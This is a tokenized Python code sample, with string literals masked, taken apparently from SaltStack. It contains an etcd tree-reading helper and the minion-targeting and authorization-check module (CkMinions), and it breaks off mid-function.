<EOL> def tree ( self , path ) : <EOL> '''<STR_LIT>''' <EOL> ret = { } <EOL> try : <EOL> items = self . read ( path ) <EOL> except ( etcd . EtcdKeyNotFound , ValueError ) : <EOL> return None <EOL> except etcd . EtcdConnectionFailed : <EOL> log . error ( "<STR_LIT>" . format ( path ) ) <EOL> return None <EOL> for item in items . children : <EOL> comps = str ( item . key ) . split ( '<STR_LIT:/>' ) <EOL> if item . dir is True : <EOL> if item . key == path : <EOL> continue <EOL> ret [ comps [ - <NUM_LIT:1> ] ] = self . tree ( item . key ) <EOL> else : <EOL> ret [ comps [ - <NUM_LIT:1> ] ] = item . value <EOL> return ret <EOL> def get_conn ( opts , profile = None ) : <EOL> client = EtcdClient ( opts , profile ) <EOL> return client <EOL> def tree ( client , path ) : <EOL> return client . tree ( path ) </s>
<s> '''<STR_LIT>''' <EOL> from __future__ import absolute_import <EOL> import os <EOL> import fnmatch <EOL> import re <EOL> import logging <EOL> import salt . payload <EOL> import salt . utils <EOL> from salt . defaults import DEFAULT_TARGET_DELIM <EOL> from salt . exceptions import CommandExecutionError <EOL> import salt . auth . ldap <EOL> import salt . ext . six as six <EOL> import salt . ext . six as six <EOL> if six . PY3 : <EOL> import ipaddress <EOL> else : <EOL> import salt . ext . ipaddress as ipaddress <EOL> HAS_RANGE = False <EOL> try : <EOL> import seco . range <EOL> HAS_RANGE = True <EOL> except ImportError : <EOL> pass <EOL> log = logging . getLogger ( __name__ ) <EOL> TARGET_REX = re . compile ( <EOL> r'''<STR_LIT>''' <EOL> ) <EOL> def parse_target ( target_expression ) : <EOL> '''<STR_LIT>''' <EOL> match = TARGET_REX . match ( target_expression ) <EOL> if not match : <EOL> log . warning ( '<STR_LIT>' . format ( target_expression ) ) <EOL> ret = { <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : target_expression , <EOL> } <EOL> else : <EOL> ret = match . groupdict ( ) <EOL> return ret <EOL> def get_minion_data ( minion , opts ) : <EOL> '''<STR_LIT>''' <EOL> if opts . get ( '<STR_LIT>' , False ) : <EOL> serial = salt . payload . Serial ( opts ) <EOL> cdir = os . path . join ( opts [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> if not os . path . isdir ( cdir ) : <EOL> return minion if minion else None , None , None <EOL> minions = os . listdir ( cdir ) <EOL> if minion is None : <EOL> for id_ in minions : <EOL> datap = os . path . join ( cdir , id_ , '<STR_LIT>' ) <EOL> try : <EOL> with salt . utils . fopen ( datap , '<STR_LIT:rb>' ) as fp_ : <EOL> miniondata = serial . load ( fp_ ) <EOL> except ( IOError , OSError ) : <EOL> continue <EOL> grains = miniondata . get ( '<STR_LIT>' ) <EOL> pillar = miniondata . get ( '<STR_LIT>' ) <EOL> return id_ , grains , pillar <EOL> else : <EOL> datap = os . path . join ( cdir , minion , '<STR_LIT>' ) <EOL> try : <EOL> with salt . utils . fopen ( datap , '<STR_LIT:rb>' ) as fp_ : <EOL> miniondata = serial . load ( fp_ ) <EOL> except ( IOError , OSError ) : <EOL> return minion , None , None <EOL> grains = miniondata . get ( '<STR_LIT>' ) <EOL> pillar = miniondata . get ( '<STR_LIT>' ) <EOL> return minion , grains , pillar <EOL> return minion if minion else None , None , None <EOL> def nodegroup_comp ( nodegroup , nodegroups , skip = None , first_call = True ) : <EOL> '''<STR_LIT>''' <EOL> expanded_nodegroup = False <EOL> if skip is None : <EOL> skip = set ( ) <EOL> elif nodegroup in skip : <EOL> log . error ( '<STR_LIT>' . format ( nodegroup ) ) <EOL> return '<STR_LIT>' <EOL> if nodegroup not in nodegroups : <EOL> log . error ( '<STR_LIT>' . format ( nodegroup ) ) <EOL> return '<STR_LIT>' <EOL> nglookup = nodegroups [ nodegroup ] <EOL> if isinstance ( nglookup , six . string_types ) : <EOL> words = nglookup . split ( ) <EOL> elif isinstance ( nglookup , ( list , tuple ) ) : <EOL> words = nglookup <EOL> else : <EOL> log . error ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' . format ( nodegroup , nglookup ) <EOL> ) <EOL> return '<STR_LIT>' <EOL> skip . add ( nodegroup ) <EOL> ret = [ ] <EOL> opers = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:(>' , '<STR_LIT:)>' ] <EOL> for word in words : <EOL> if word in opers : <EOL> ret . append ( word ) <EOL> elif len ( word ) >= <NUM_LIT:3> and word . startswith ( '<STR_LIT>' ) : <EOL> expanded_nodegroup = True <EOL> ret . extend ( nodegroup_comp ( word [ <NUM_LIT:2> : ] , nodegroups , skip = skip , first_call = False ) ) <EOL> else : <EOL> ret . append ( word ) <EOL> if ret : <EOL> ret . insert ( <NUM_LIT:0> , '<STR_LIT:(>' ) <EOL> ret . append ( '<STR_LIT:)>' ) <EOL> skip . remove ( nodegroup ) <EOL> log . debug ( '<STR_LIT>' . format ( nodegroup , ret ) ) <EOL> if expanded_nodegroup or not first_call : <EOL> return ret <EOL> else : <EOL> log . debug ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> . format ( nodegroups [ nodegroup ] ) ) <EOL> return nodegroups [ nodegroup ] <EOL> class CkMinions ( object ) : <EOL> '''<STR_LIT>''' <EOL> def __init__ ( self , opts ) : <EOL> self . opts = opts <EOL> self . serial = salt . payload . Serial ( opts ) <EOL> if self . opts . get ( '<STR_LIT>' , '<STR_LIT>' ) in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> self . acc = '<STR_LIT>' <EOL> else : <EOL> self . acc = '<STR_LIT>' <EOL> def _check_glob_minions ( self , expr , greedy ) : <EOL> '''<STR_LIT>''' <EOL> pki_dir = os . path . join ( self . opts [ '<STR_LIT>' ] , self . acc ) <EOL> try : <EOL> files = [ ] <EOL> for fn_ in salt . utils . isorted ( os . listdir ( pki_dir ) ) : <EOL> if not fn_ . startswith ( '<STR_LIT:.>' ) and os . path . isfile ( os . path . join ( pki_dir , fn_ ) ) : <EOL> files . append ( fn_ ) <EOL> return fnmatch . filter ( files , expr ) <EOL> except OSError : <EOL> return [ ] <EOL> def _check_list_minions ( self , expr , greedy ) : <EOL> '''<STR_LIT>''' <EOL> if isinstance ( expr , six . string_types ) : <EOL> expr = [ m for m in expr . split ( '<STR_LIT:U+002C>' ) if m ] <EOL> ret = [ ] <EOL> for minion in expr : <EOL> if os . path . isfile ( os . path . join ( self . opts [ '<STR_LIT>' ] , self . acc , minion ) ) : <EOL> ret . append ( minion ) <EOL> return ret <EOL> def _check_pcre_minions ( self , expr , greedy ) : <EOL> '''<STR_LIT>''' <EOL> try : <EOL> minions = [ ] <EOL> for fn_ in salt . utils . isorted ( os . listdir ( os . path . join ( self . opts [ '<STR_LIT>' ] , self . acc ) ) ) : <EOL> if not fn_ . startswith ( '<STR_LIT:.>' ) and os . path . isfile ( os . path . join ( self . opts [ '<STR_LIT>' ] , self . acc , fn_ ) ) : <EOL> minions . append ( fn_ ) <EOL> reg = re . compile ( expr ) <EOL> return [ m for m in minions if reg . match ( m ) ] <EOL> except OSError : <EOL> return [ ] <EOL> def _check_cache_minions ( self , <EOL> expr , <EOL> delimiter , <EOL> greedy , <EOL> search_type , <EOL> regex_match = False , <EOL> exact_match = False ) : <EOL> '''<STR_LIT>''' <EOL> cache_enabled = self . opts . get ( '<STR_LIT>' , False ) <EOL> if greedy : <EOL> mlist = [ ] <EOL> for fn_ in salt . utils . isorted ( os . listdir ( os . path . join ( self . opts [ '<STR_LIT>' ] , self . acc ) ) ) : <EOL> if not fn_ . startswith ( '<STR_LIT:.>' ) and os . path . isfile ( os . path . join ( self . opts [ '<STR_LIT>' ] , self . acc , fn_ ) ) : <EOL> mlist . append ( fn_ ) <EOL> minions = set ( mlist ) <EOL> elif cache_enabled : <EOL> minions = os . listdir ( os . path . join ( self . opts [ '<STR_LIT>' ] , '<STR_LIT>' ) ) <EOL> else : <EOL> return list ( ) <EOL> if cache_enabled : <EOL> cdir = os . path . join ( self . opts [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> if not os . path . isdir ( cdir ) : <EOL> return list ( minions ) <EOL> for id_ in os . listdir ( cdir ) : <EOL> if not greedy and id_ not in minions : <EOL> continue <EOL> datap = os . path . join ( cdir , id_ , '<STR_LIT>' ) <EOL> if not os . path . isfile ( datap ) : <EOL> if not greedy and id_ in minions : <EOL> minions . remove ( id_ ) <EOL> continue <EOL> search_results = self . serial . load ( <EOL> salt . utils . fopen ( datap , '<STR_LIT:rb>' ) <EOL> ) . get ( search_type ) <EOL> if not salt . utils . subdict_match ( search_results , <EOL> expr , <EOL> delimiter = delimiter , <EOL> regex_match = regex_match , <EOL> exact_match = exact_match ) and id_ in minions : <EOL> minions . remove ( id_ ) <EOL> return list ( minions ) <EOL> def _check_grain_minions ( self , expr , delimiter , greedy ) : <EOL> '''<STR_LIT>''' <EOL> return self . _check_cache_minions ( expr , delimiter , greedy , '<STR_LIT>' ) <EOL> def _check_grain_pcre_minions ( self , expr , delimiter , greedy ) : <EOL> '''<STR_LIT>''' <EOL> return self . _check_cache_minions ( expr , <EOL> delimiter , <EOL> greedy , <EOL> '<STR_LIT>' , <EOL> regex_match = True ) <EOL> def _check_pillar_minions ( self , expr , delimiter , greedy ) : <EOL> '''<STR_LIT>''' <EOL> return self . _check_cache_minions ( expr , delimiter , greedy , '<STR_LIT>' ) <EOL> def _check_pillar_pcre_minions ( self , expr , delimiter , greedy ) : <EOL> '''<STR_LIT>''' <EOL> return self . _check_cache_minions ( expr , <EOL> delimiter , <EOL> greedy , <EOL> '<STR_LIT>' , <EOL> regex_match = True ) <EOL> def _check_pillar_exact_minions ( self , expr , delimiter , greedy ) : <EOL> '''<STR_LIT>''' <EOL> return self . _check_cache_minions ( expr , <EOL> delimiter , <EOL> greedy , <EOL> '<STR_LIT>' , <EOL> exact_match = True ) <EOL> def _check_ipcidr_minions ( self , expr , greedy ) : <EOL> '''<STR_LIT>''' <EOL> cache_enabled = self . opts . get ( '<STR_LIT>' , False ) <EOL> if greedy : <EOL> mlist = [ ] <EOL> for fn_ in salt . utils . isorted ( os . listdir ( os . path . join ( self . opts [ '<STR_LIT>' ] , self . acc ) ) ) : <EOL> if not fn_ . startswith ( '<STR_LIT:.>' ) and os . path . isfile ( os . path . join ( self . opts [ '<STR_LIT>' ] , self . acc , fn_ ) ) : <EOL> mlist . append ( fn_ ) <EOL> minions = set ( mlist ) <EOL> elif cache_enabled : <EOL> minions = os . listdir ( os . path . join ( self . opts [ '<STR_LIT>' ] , '<STR_LIT>' ) ) <EOL> else : <EOL> return [ ] <EOL> if cache_enabled : <EOL> cdir = os . path . join ( self . opts [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> if not os . path . isdir ( cdir ) : <EOL> return list ( minions ) <EOL> tgt = expr <EOL> try : <EOL> tgt = ipaddress . ip_address ( tgt ) <EOL> except : <EOL> try : <EOL> tgt = ipaddress . ip_network ( tgt ) <EOL> except : <EOL> log . error ( '<STR_LIT>' . format ( tgt ) ) <EOL> return [ ] <EOL> proto = '<STR_LIT>' . format ( tgt . version ) <EOL> for id_ in os . listdir ( cdir ) : <EOL> if not greedy and id_ not in minions : <EOL> continue <EOL> datap = os . path . join ( cdir , id_ , '<STR_LIT>' ) <EOL> if not os . path . isfile ( datap ) : <EOL> if not greedy and id_ in minions : <EOL> minions . remove ( id_ ) <EOL> continue <EOL> try : <EOL> with salt . utils . fopen ( datap , '<STR_LIT:rb>' ) as fp_ : <EOL> grains = self . serial . load ( fp_ ) . get ( '<STR_LIT>' ) <EOL> except ( IOError , OSError ) : <EOL> continue <EOL> if proto not in grains : <EOL> match = False <EOL> elif isinstance ( tgt , ( ipaddress . IPv4Address , ipaddress . IPv6Address ) ) : <EOL> match = str ( tgt ) in grains [ proto ] <EOL> else : <EOL> match = salt . utils . network . in_subnet ( tgt , grains [ proto ] ) <EOL> if not match and id_ in minions : <EOL> minions . remove ( id_ ) <EOL> return list ( minions ) <EOL> def _check_range_minions ( self , expr , greedy ) : <EOL> '''<STR_LIT>''' <EOL> if not HAS_RANGE : <EOL> raise CommandExecutionError ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) <EOL> if not hasattr ( self , '<STR_LIT>' ) : <EOL> self . _range = seco . range . Range ( self . opts [ '<STR_LIT>' ] ) <EOL> try : <EOL> return self . _range . expand ( expr ) <EOL> except seco . range . RangeException as exc : <EOL> log . error ( <EOL> '<STR_LIT>' . format ( exc ) <EOL> ) <EOL> cache_enabled = self . opts . get ( '<STR_LIT>' , False ) <EOL> if greedy : <EOL> mlist = [ ] <EOL> for fn_ in salt . utils . isorted ( os . listdir ( os . path . join ( self . opts [ '<STR_LIT>' ] , self . acc ) ) ) : <EOL> if not fn_ . startswith ( '<STR_LIT:.>' ) and os . path . isfile ( os . path . join ( self . opts [ '<STR_LIT>' ] , self . acc , fn_ ) ) : <EOL> mlist . append ( fn_ ) <EOL> return mlist <EOL> elif cache_enabled : <EOL> return os . listdir ( os . path . join ( self . opts [ '<STR_LIT>' ] , '<STR_LIT>' ) ) <EOL> else : <EOL> return list ( ) <EOL> def _check_compound_pillar_exact_minions ( self , expr , delimiter , greedy ) : <EOL> '''<STR_LIT>''' <EOL> return self . _check_compound_minions ( expr , <EOL> delimiter , <EOL> greedy , <EOL> pillar_exact = True ) <EOL> def _check_compound_minions ( self , <EOL> expr , <EOL> delimiter , <EOL> greedy , <EOL> pillar_exact = False ) : <EOL> '''<STR_LIT>''' <EOL> log . debug ( '<STR_LIT>' . format ( expr , delimiter , greedy , pillar_exact ) ) <EOL> if not isinstance ( expr , six . string_types ) and not isinstance ( expr , ( list , tuple ) ) : <EOL> log . error ( '<STR_LIT>' ) <EOL> return [ ] <EOL> mlist = [ ] <EOL> for fn_ in salt . utils . isorted ( os . listdir ( os . path . join ( self . opts [ '<STR_LIT>' ] , self . acc ) ) ) : <EOL> if not fn_ . startswith ( '<STR_LIT:.>' ) and os . path . isfile ( os . path . join ( self . opts [ '<STR_LIT>' ] , self . acc , fn_ ) ) : <EOL> mlist . append ( fn_ ) <EOL> minions = set ( mlist ) <EOL> log . debug ( '<STR_LIT>' . format ( minions ) ) <EOL> if self . opts . get ( '<STR_LIT>' , False ) : <EOL> ref = { '<STR_LIT>' : self . _check_grain_minions , <EOL> '<STR_LIT:P>' : self . _check_grain_pcre_minions , <EOL> '<STR_LIT:I>' : self . _check_pillar_minions , <EOL> '<STR_LIT>' : self . _check_pillar_pcre_minions , <EOL> '<STR_LIT:L>' : self . _check_list_minions , <EOL> '<STR_LIT:N>' : None , <EOL> '<STR_LIT:S>' : self . _check_ipcidr_minions , <EOL> '<STR_LIT:E>' : self . _check_pcre_minions , <EOL> '<STR_LIT:R>' : self . _all_minions } <EOL> if pillar_exact : <EOL> ref [ '<STR_LIT:I>' ] = self . _check_pillar_exact_minions <EOL> ref [ '<STR_LIT>' ] = self . _check_pillar_exact_minions <EOL> results = [ ] <EOL> unmatched = [ ] <EOL> opers = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:(>' , '<STR_LIT:)>' ] <EOL> if isinstance ( expr , six . string_types ) : <EOL> words = expr . split ( ) <EOL> else : <EOL> words = expr <EOL> for word in words : <EOL> target_info = parse_target ( word ) <EOL> if word in opers : <EOL> if results : <EOL> if results [ - <NUM_LIT:1> ] == '<STR_LIT:(>' and word in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> log . error ( '<STR_LIT>' . format ( word ) ) <EOL> return [ ] <EOL> if word == '<STR_LIT>' : <EOL> if not results [ - <NUM_LIT:1> ] in ( '<STR_LIT:&>' , '<STR_LIT:|>' , '<STR_LIT:(>' ) : <EOL> results . append ( '<STR_LIT:&>' ) <EOL> results . append ( '<STR_LIT:(>' ) <EOL> results . append ( str ( set ( minions ) ) ) <EOL> results . append ( '<STR_LIT:->' ) <EOL> unmatched . append ( '<STR_LIT:->' ) <EOL> elif word == '<STR_LIT>' : <EOL> results . append ( '<STR_LIT:&>' ) <EOL> elif word == '<STR_LIT>' : <EOL> results . append ( '<STR_LIT:|>' ) <EOL> elif word == '<STR_LIT:(>' : <EOL> results . append ( word ) <EOL> unmatched . append ( word ) <EOL> elif word == '<STR_LIT:)>' : <EOL> if not unmatched or unmatched [ - <NUM_LIT:1> ] != '<STR_LIT:(>' : <EOL> log . error ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> . format ( expr ) ) <EOL> return [ ] <EOL> results . append ( word ) <EOL> unmatched . pop ( ) <EOL> if unmatched and unmatched [ - <NUM_LIT:1> ] == '<STR_LIT:->' : <EOL> results . append ( '<STR_LIT:)>' ) <EOL> unmatched . pop ( ) <EOL> else : <EOL> log . error ( '<STR_LIT>' <EOL> . format ( expr ) ) <EOL> return [ ] <EOL> else : <EOL> if word == '<STR_LIT>' : <EOL> results . append ( '<STR_LIT:(>' ) <EOL> results . append ( str ( set ( minions ) ) ) <EOL> results . append ( '<STR_LIT:->' ) <EOL> unmatched . append ( '<STR_LIT:->' ) <EOL> elif word == '<STR_LIT:(>' : <EOL> results . append ( word ) <EOL> unmatched . append ( word ) <EOL> else : <EOL> log . error ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' . format ( word ) <EOL> ) <EOL> return [ ] <EOL> elif target_info and target_info [ '<STR_LIT>' ] : <EOL> if '<STR_LIT:N>' == target_info [ '<STR_LIT>' ] : <EOL> log . error ( '<STR_LIT>' . format ( word ) ) <EOL> return [ ] <EOL> engine = ref . get ( target_info [ '<STR_LIT>' ] ) <EOL> if not engine : <EOL> log . error ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' . format ( <EOL> target_info [ '<STR_LIT>' ] , <EOL> word , <EOL> ) <EOL> ) <EOL> return [ ] <EOL> engine_args = [ target_info [ '<STR_LIT>' ] ] <EOL> if target_info [ '<STR_LIT>' ] in ( '<STR_LIT>' , '<STR_LIT:P>' , '<STR_LIT:I>' , '<STR_LIT>' ) : <EOL> engine_args . append ( target_info [ '<STR_LIT>' ] or '<STR_LIT::>' ) <EOL> engine_args . append ( True ) <EOL> results . append ( str ( set ( engine ( * engine_args ) ) ) ) <EOL> if unmatched and unmatched [ - <NUM_LIT:1> ] == '<STR_LIT:->' : <EOL> results . append ( '<STR_LIT:)>' ) <EOL> unmatched . pop ( ) <EOL> else : <EOL> results . append ( str ( set ( self . _check_glob_minions ( word , True ) ) ) ) <EOL> if unmatched and unmatched [ - <NUM_LIT:1> ] == '<STR_LIT:->' : <EOL> results . append ( '<STR_LIT:)>' ) <EOL> unmatched . pop ( ) <EOL> results . extend ( [ '<STR_LIT:)>' for item in unmatched ] ) <EOL> results = '<STR_LIT:U+0020>' . join ( results ) <EOL> log . debug ( '<STR_LIT>' <EOL> . format ( results ) ) <EOL> try : <EOL> return list ( eval ( results ) ) <EOL> except Exception : <EOL> log . error ( '<STR_LIT>' . format ( expr ) ) <EOL> return [ ] <EOL> return list ( minions ) <EOL> def connected_ids ( self , subset = None , show_ipv4 = False , include_localhost = False ) : <EOL> '''<STR_LIT>''' <EOL> minions = set ( ) <EOL> if self . opts . get ( '<STR_LIT>' , False ) : <EOL> cdir = os . path . join ( self . opts [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> if not os . path . isdir ( cdir ) : <EOL> return minions <EOL> addrs = salt . utils . network . local_port_tcp ( int ( self . opts [ '<STR_LIT>' ] ) ) <EOL> if '<STR_LIT:127.0.0.1>' in addrs or '<STR_LIT>' in addrs : <EOL> addrs . discard ( '<STR_LIT:127.0.0.1>' ) <EOL> addrs . discard ( '<STR_LIT>' ) <EOL> addrs . update ( set ( salt . utils . network . ip_addrs ( ) ) ) <EOL> if subset : <EOL> search = subset <EOL> else : <EOL> search = os . listdir ( cdir ) <EOL> for id_ in search : <EOL> datap = os . path . join ( cdir , id_ , '<STR_LIT>' ) <EOL> try : <EOL> with salt . utils . fopen ( datap , '<STR_LIT:rb>' ) as fp_ : <EOL> grains = self . serial . load ( fp_ ) . get ( '<STR_LIT>' , { } ) <EOL> except ( AttributeError , IOError , OSError ) : <EOL> continue <EOL> for ipv4 in grains . get ( '<STR_LIT>' , [ ] ) : <EOL> if ipv4 == '<STR_LIT:127.0.0.1>' and not include_localhost : <EOL> continue <EOL> if ipv4 == '<STR_LIT>' : <EOL> continue <EOL> if ipv4 in addrs : <EOL> if show_ipv4 : <EOL> minions . add ( ( id_ , ipv4 ) ) <EOL> else : <EOL> minions . add ( id_ ) <EOL> break <EOL> return minions <EOL> def _all_minions ( self , expr = None ) : <EOL> '''<STR_LIT>''' <EOL> mlist = [ ] <EOL> for fn_ in salt . utils . isorted ( os . listdir ( os . path . join ( self . opts [ '<STR_LIT>' ] , self . acc ) ) ) : <EOL> if not fn_ . startswith ( '<STR_LIT:.>' ) and os . path . isfile ( os . path . join ( self . opts [ '<STR_LIT>' ] , self . acc , fn_ ) ) : <EOL> mlist . append ( fn_ ) <EOL> return mlist <EOL> def check_minions ( self , <EOL> expr , <EOL> expr_form = '<STR_LIT>' , <EOL> delimiter = DEFAULT_TARGET_DELIM , <EOL> greedy = True ) : <EOL> '''<STR_LIT>''' <EOL> try : <EOL> check_func = getattr ( self , '<STR_LIT>' . format ( expr_form ) , None ) <EOL> if expr_form in ( '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ) : <EOL> minions = check_func ( expr , delimiter , greedy ) <EOL> else : <EOL> minions = check_func ( expr , greedy ) <EOL> except Exception : <EOL> log . exception ( <EOL> '<STR_LIT>' <EOL> . format ( expr_form , expr ) ) <EOL> minions = [ ] <EOL> return minions <EOL> def _expand_matching ( self , auth_entry ) : <EOL> ref = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:P>' : '<STR_LIT>' , <EOL> '<STR_LIT:I>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:L>' : '<STR_LIT:list>' , <EOL> '<STR_LIT:S>' : '<STR_LIT>' , <EOL> '<STR_LIT:E>' : '<STR_LIT>' , <EOL> '<STR_LIT:N>' : '<STR_LIT>' , <EOL> None : '<STR_LIT>' } <EOL> target_info = parse_target ( auth_entry ) <EOL> if not target_info : <EOL> log . error ( '<STR_LIT>' . format ( auth_entry ) ) <EOL> v_matcher = ref . get ( target_info [ '<STR_LIT>' ] ) <EOL> v_expr = target_info [ '<STR_LIT>' ] <EOL> return set ( self . check_minions ( v_expr , v_matcher ) ) <EOL> def validate_tgt ( self , valid , expr , expr_form ) : <EOL> '''<STR_LIT>''' <EOL> v_minions = self . _expand_matching ( valid ) <EOL> minions = set ( self . check_minions ( expr , expr_form ) ) <EOL> d_bool = not bool ( minions . difference ( v_minions ) ) <EOL> if len ( v_minions ) == len ( minions ) and d_bool : <EOL> return True <EOL> return d_bool <EOL> def match_check ( self , regex , fun ) : <EOL> '''<STR_LIT>''' <EOL> vals = [ ] <EOL> if isinstance ( fun , str ) : <EOL> fun = [ fun ] <EOL> for func in fun : <EOL> try : <EOL> if re . match ( regex , func ) : <EOL> vals . append ( True ) <EOL> else : <EOL> vals . append ( False ) <EOL> except Exception : <EOL> log . error ( '<STR_LIT>' . format ( regex ) ) <EOL> return vals and all ( vals ) <EOL> def any_auth ( self , form , auth_list , fun , arg , tgt = None , tgt_type = '<STR_LIT>' ) : <EOL> '''<STR_LIT>''' <EOL> if form == '<STR_LIT>' : <EOL> return self . auth_check ( <EOL> auth_list , <EOL> fun , <EOL> arg , <EOL> tgt , <EOL> tgt_type ) <EOL> return self . spec_check ( <EOL> auth_list , <EOL> fun , <EOL> form ) <EOL> def auth_check_expanded ( self , <EOL> auth_list , <EOL> funs , <EOL> args , <EOL> tgt , <EOL> tgt_type = '<STR_LIT>' , <EOL> groups = None , <EOL> publish_validate = False ) : <EOL> v_tgt_type = tgt_type <EOL> if tgt_type . lower ( ) in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> v_tgt_type = '<STR_LIT>' <EOL> elif tgt_type . lower ( ) == '<STR_LIT>' : <EOL> v_tgt_type = '<STR_LIT>' <EOL> v_minions = set ( self . check_minions ( tgt , v_tgt_type ) ) <EOL> minions = set ( self . check_minions ( tgt , tgt_type ) ) <EOL> mismatch = bool ( minions . difference ( v_minions ) ) <EOL> if publish_validate : <EOL> if mismatch : <EOL> return False <EOL> if not isinstance ( funs , list ) : <EOL> funs = [ funs ] <EOL> args = [ args ] <EOL> allowed_minions = set ( ) <EOL> auth_dictionary = { } <EOL> for auth_list_entry in auth_list : <EOL> if isinstance ( auth_list_entry , six . string_types ) : <EOL> for fun in funs : <EOL> if self . match_check ( auth_list_entry , fun ) : <EOL> return True <EOL> if isinstance ( auth_list_entry , dict ) : <EOL> if len ( auth_list_entry ) != <NUM_LIT:1> : <EOL> log . info ( '<STR_LIT>' . format ( auth_list_entry ) ) <EOL> continue <EOL> allowed_minions . update ( set ( auth_list_entry . keys ( ) ) ) <EOL> for key in auth_list_entry . keys ( ) : <EOL> for match in self . _expand_matching ( key ) : <EOL> if match in auth_dictionary : <EOL> auth_dictionary [ match ] . extend ( auth_list_entry [ key ] ) <EOL> else : <EOL> auth_dictionary [ match ] = auth_list_entry [ key ] <EOL> allowed_minions_from_auth_list = set ( ) <EOL> for next_entry in allowed_minions : <EOL> allowed_minions_from_auth_list . update ( self . _expand_matching ( next_entry ) ) <EOL> if len ( minions - allowed_minions_from_auth_list ) > <NUM_LIT:0> : <EOL> return False <EOL> try : <EOL> for minion in minions : <EOL> results = [ ] <EOL> for num , fun in enumerate ( auth_dictionary [ minion ] ) : <EOL> results . append ( self . match_check ( fun , funs ) ) <EOL> if not any ( results ) : <EOL> return False <EOL> return True <EOL> except TypeError : <EOL> return False <EOL> return False <EOL> def auth_check ( self , <EOL> auth_list , <EOL> funs , <EOL> args , <EOL> tgt , <EOL> tgt_type = '<STR_LIT>' , <EOL> groups = None , <EOL> publish_validate = False ) : <EOL> '''<STR_LIT>''' <EOL> if self . opts . get ( '<STR_LIT>' , False ) : <EOL> return self . auth_check_expanded ( auth_list , funs , args , tgt , tgt_type , groups , publish_validate ) <EOL> if publish_validate : <EOL> v_tgt_type = tgt_type <EOL> if tgt_type . lower ( ) in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> v_tgt_type = '<STR_LIT>' <EOL> elif tgt_type . lower ( ) == '<STR_LIT>' : <EOL> v_tgt_type = '<STR_LIT>' <EOL> v_minions = set ( self . check_minions ( tgt , v_tgt_type ) ) <EOL> minions = set ( self . check_minions ( tgt , tgt_type ) ) <EOL> mismatch = bool ( minions . difference ( v_minions ) ) <EOL> if mismatch : <EOL> return False <EOL> if not isinstance ( funs , list ) : <EOL> funs = [ funs ] <EOL> args = [ args ] <EOL> try : <EOL> for num , fun in enumerate ( funs ) : <EOL> for ind in auth_list : <EOL> if isinstance ( ind , six . string_types ) : <EOL> if self . match_check ( ind , fun ) : <EOL> return True <EOL> elif isinstance ( ind , dict ) : <EOL> if len ( ind ) != <NUM_LIT:1> : <EOL> continue <EOL> valid = next ( six . iterkeys ( ind ) ) <EOL> if self . validate_tgt ( <EOL> valid , <EOL> tgt , <EOL> tgt_type ) : <EOL> if isinstance ( ind [ valid ] , six . string_types ) : <EOL> if self . match_check ( ind [ valid ] , fun ) : <EOL> return True <EOL> elif isinstance ( ind [ valid ] , list ) : <EOL> for cond in ind [ valid ] : <EOL> if isinstance ( cond , six . string_types ) : <EOL> if self . match_check ( cond , fun ) : <EOL> return True <EOL> elif isinstance ( cond , dict ) : <EOL> if len ( cond ) != <NUM_LIT:1> : <EOL> continue <EOL> fcond = next ( six . iterkeys ( cond ) ) <EOL> if self . match_check ( fcond , <EOL> fun ) : <EOL> acond = cond [ fcond ] <EOL> if not isinstance ( acond , dict ) : <EOL> continue <EOL> arg_list = args [ num ] <EOL> cond_args = acond . get ( '<STR_LIT:args>' , [ ] ) <EOL> good = True <EOL> for i , cond_arg in enumerate ( cond_args ) : <EOL> if len ( arg_list ) <= i : <EOL> good = False <EOL> break <EOL> if cond_arg is None : <EOL> continue <EOL> if not self . match_check ( cond_arg , <EOL> arg_list [ i ] ) : <EOL> good = False <EOL> break <EOL> if not good : <EOL> continue <EOL> cond_kwargs = acond . get ( '<STR_LIT>' , { } ) <EOL> arg_kwargs = { } <EOL> for a in arg_list : <EOL> if isinstance ( a , <EOL> dict ) and '<STR_LIT>' in a : <EOL> arg_kwargs = a <EOL> break <EOL> for k , v in six . iteritems ( cond_kwargs ) : <EOL> if k not in arg_kwargs : <EOL> good = False <EOL> break <EOL> if v is None : <EOL> continue <EOL> if not self . match_check ( v , <EOL> arg_kwargs [ k ] ) : <EOL> good = False <EOL> break <EOL> if good : <EOL> return True <EOL> except TypeError : <EOL> return False <EOL> return False <EOL> def fill_auth_list_from_groups ( self , auth_provider , user_groups , auth_list ) : <EOL> '''<STR_LIT>''' <EOL> group_names = [ item for item in auth_provider if item . endswith ( '<STR_LIT:%>' ) ] <EOL> if group_names : <EOL> for group_name in group_names : <EOL> if group_name . rstrip ( "<STR_LIT:%>" ) in user_groups : <EOL> for matcher in auth_provider [ group_name ] : <EOL> auth_list . append ( matcher ) <EOL> return auth_list <EOL> def fill_auth_list_from_ou ( self , auth_list , opts = None ) : <EOL> '''<STR_LIT>''' <EOL> ou_names = [ ] <EOL> for item in auth_list : <EOL> if isinstance ( item , six . string_types ) : <EOL> continue <EOL> ou_names . append ( [ potential_ou for potential_ou in item . keys ( ) if potential_ou . startswith ( '<STR_LIT>' ) ] ) <EOL> if ou_names : <EOL> auth_list = salt . auth . ldap . expand_ldap_entries ( auth_list , opts 